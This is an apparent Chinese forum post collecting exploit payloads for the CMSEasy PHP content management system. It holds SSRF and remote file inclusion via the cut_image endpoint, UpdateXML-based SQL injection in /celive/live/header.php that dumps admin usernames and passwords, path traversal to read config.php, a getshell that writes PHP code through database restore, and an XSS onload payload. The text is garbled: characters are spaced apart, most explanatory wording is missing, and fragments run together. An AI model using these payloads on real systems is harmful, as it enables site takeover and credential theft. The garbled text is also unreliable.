搜索

[18883] 2019-08-13_cmseasy漏洞

文档创建者:s7ckTeam
浏览次数:13
最后更新:2025-01-18
2019-08-13_cmseasy漏洞 c m s e a s y c r h u a   h u a s e c   2 0 1 9 - 0 8 - 1 3 0 1               c m s e a s y   P H P + M y S Q L U R L 0 2 1 2 c u t _ i m a g e 5 . 5 p a y l o a d : f t p c p h p i n f o . p h p p a y l o a d : / i n d e x . p h p ? c a s e = a d m i n & a c t = l o g i n & a d m i n _ d i r = a d m i n & s i t e = d e f a u l t / c a c h e / d a t a / i n f . t x p o s t   / i n d e x . p h p ? c a s e = t o o l & a c t = c u t _ i m a g e   p i c = 1 f t p : / / l o c a l h o s t / t e s t . p h p & w = 7 0 0 & h = 1 1 2 0 $ x 1 = 0 & x 2 = 7 0 0 % y 1 = 0 y 2 = 1 1 2 0   h t t p : / / w w w . t e s t . i c h u n q i u / i n d e x . p h p ? c a s e = t o o l & a c t = c u t _ i m a g e P O S T : p i c = 1 f t p : / / 1 7 2 . 1 6 . 1 1 . 2 / p h p i n f o . p h p & w = 7 0 0 & h = 1 1 2 0 & x 1 = 0 & x 2 = 7 0 0 & y 1 = 0 & y 2 = 1 1 2 0
2 S Q L p a y l o a d 1 ~ 3 2 y e s e r c m s _ u s e r 7 2 0 ~ 8 0 0 y e s e r c m s _ u s e r 3 p a y l o a d : ( 4 ) p a y l o a d : ( 5 ) X S S   - >     - > - - ( 6 ) g e t s h e l l - - - - - - P a y l o a d p a y l o a d / c e l i v e / l i v e / h e a d e r . p h p P O S T : x a j a x = P o s t d a t a & x a j a x a r g s [ 0 ] = < x j x q u e r y > < q > d e t a i l = x x x x x x ' , ( U p d a t e X M L ( 1 , C O N C A T ( 0 x 5 b , m i d ( ( S E L E C T / * * / G R O U P _ C O N C A T ( c o n c a t ( d a t a b a s e ( ) ) )   ) , 1 , 3 2 ) , 0 x 5 d ) , 1 ) ) , N U L L , N U L L , N U L L , N U L L , N U L L , N U L L / c e l i v e / l i v e / h e a d e r . p h p P O S T : x a j a x = P o s t d a t a & x a j a x a r g s [ 0 ] = < x j x q u e r y > < q > d e t a i l = x x x x x x ' , ( U p d a t e X M L ( 1 , C O N C A T ( 0 x 5 b , m i d ( ( S E L E C T / * * / G R O U P _ C O N C A T ( t a b l e _ n a m e )   f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   w h e r e   t a b l e _ s c h e m a = d a t a b a s e ( )   ) , / c e l i v e / l i v e / h e a d e r . p h p P O S T : x a j a x = L i v e M e s s a g e & x a j a x a r g s [ 0 ] = < x j x o b j > < q > < e > < k > n a m e < / k > < v > ' , ( U p d a t e X M L ( 1 , C O N C A T ( 0 x 5 b , m i d ( ( S E L E C T / * * / G R O U P _ C O N C A T ( c o n c a t ( u s e r n a m e , ' | ' , p a s s w o r d ) )   f r o m   c m s e a s y _ u s e r ) , 1 , 3 2 ) , 0 x 5 d ) , 1 ) ) , N U L L , N U L L , N U L L , N U L L , N U L L , N U L L ) - - % 2 0 / i n d e x . p h p ? c a s e = t e m p l a t e & a c t = f e t c h & a d m i n _ d i r = a d m i n & s i t e = d e f a u l t P O S T : & i d = . . / . . / c o n f i g / c o n f i g . p h p / i n d e x . p h p ? c a s e = d a t a b a s e & a c t = r e s t o r e & a d m i n _ d i r = a d m i n & s i t e = d e f a u l t P O S T : s e l e c t % 5 B % 5 D = . . / t e s t & s u b m i t = + % C 3 % 9 7 + % E 5 % 8 8 % A 0 % E 9 % 9 9 % A 4 + 1 1 1 1 1 1 1 1 1 1 " ; } < ? p h p   p h p i n f o ( ) ? >
( 7 ) X S S p a y l o a d : 0 3         c m s r p o r p o r p o 1 1 1 1 1 1 1 1 1 1 " ; } < ? p h p   p h p i n f o ( ) ? > / i n d e x . p h p / " o n l o a d = ' a l e r t ( / a s k j / ) '   t e s t = " h t t p s : / / w w w . c n b l o g s . c o m / y x 2 0 1 4 5 3 1 2 / p / 7 0 2 0 5 1 6 . h t m l h t t p s : / / w w w . c n b l o g s . c o m / R e n o S t u d i o / p / 1 0 5 4 1 8 7 6 . h t m l h t t p s : / / c l o u d . t e n c e n t . c o m / d e v e l o p e r / a r t i c l e / 1 4 5 9 2 3 8 h t t p s : / / b l o g . d y b o y . c n / w e b s e c u r i t y / 6 4 . h t m l
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理